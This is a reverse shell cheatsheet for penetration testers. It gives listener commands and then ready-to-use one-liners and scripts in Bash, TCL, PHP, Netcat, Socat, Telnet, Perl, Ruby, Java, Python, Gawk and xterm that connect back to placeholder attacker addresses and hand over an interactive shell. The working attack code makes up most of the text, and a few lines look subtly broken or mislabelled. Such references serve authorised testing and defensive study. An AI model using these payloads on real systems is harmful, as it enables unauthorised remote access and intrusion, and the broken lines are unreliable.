Reverse Shell Cheatsheet


During penetration testing, we might be lucky enough to exploit a command execution vulnerability. Soon after, we want an interactive shell to penetrate deeper. Some approaches involve a "login" mechanism, such as adding a new account, an SSH key, or a .rhosts file. However, if those approaches are not viable, the next hop is a shell: either a reverse shell or a shell bound to a TCP port. As stated in the title, we will discuss the former.

Below we curate reverse shells that use various programming languages or tools available on the target machine.

Listening Home

Most network firewall egress filters allow:

http (tcp port 80)
https (tcp port 443)
dns (tcp/udp port 53)
smtp (tcp port 53)
ping (icmp requests and echo replies)

While this is not always true, it can be our initial attempt: set the listening socket on one of those ports. Remember that a reverse shell needs a "home", something on our machine that listens for and communicates with the reverse shell.

The simplest trick at our disposal is using netcat to listen on a socket. Most likely netcat is installed by default.

nc -vlp 13510

Or, if we are using socat, we can use this.

socat READLINE,history:/tmp/history.cmds TCP4-LISTEN:13510

Or we can set up a redirector on a public-facing machine which forwards the traffic to our system.

Reverse Shell

Bash

exec 5<>/dev/tcp/10.0.0.1/13510
cat <&5 | while read line; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/10.0.0.1/13510 0>&1

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/10.0.0.1/13510; sh <&196 >&196 2>&196

TCLsh

#!/usr/bin/tclsh
set s [socket <IP> <PORT>];
while {42} {
    puts -nonewline $s "shell>";
    flush $s;
    gets $s c;
    set e "exec $c";
    if {![catch {set r [eval $e]} err]} { puts $s $r; }
    flush $s;
}
close $s;

echo 'set s [socket <IP> <PORT>];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

PHP

php -r '$sock=fsockopen("10.0.0.1",13510);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",13510);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",13510);`/bin/sh -i <&3 >&3 2>&3`;'

php -r '$sock=fsockopen("10.0.0.1",13510);system("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",13510);popen("/bin/sh -i <&3 >&3 2>&3");'

Netcat

nc -e /bin/sh 10.0.0.1 13510

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 13510 >/tmp/f

/bin/sh | nc 10.0.0.1 13510

Socat

socat TCP:10.0.0.1:13510 EXEC:/bin/bash

socat OPENSSL:10.0.0.1:13510 EXEC:/bin/bash,pty

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 0/tmp/p

telnet 10.0.0.1 80 | /bin/bash | telnet 10.0.0.1 0 443

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=13510;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

For Windows:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:13510");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",13510).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1","13510");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

ruby -rsocket -e "c=TCPSocket.new("10.0.0.1","13510");while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/13510;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk

#!/usr/bin/awk -f
BEGIN {
    s = "/inet/tcp/0/10.0.0.1/13510"
    while(42) {
        do{
            printf "shell>" |& s
            s |& getline c
            if(c){
                while ((c |& getline) > 0)
                    print $0 |& s
                close(c)
            }
        } while(c != "exit")
        close(s)
    }
}

awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/13510"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

xterm

One of the simplest reverse shells.

xterm -display :13510

To catch the incoming xterm reverse shell session on our side:

xterm -display 10.0.0.1:1

Xnest :1
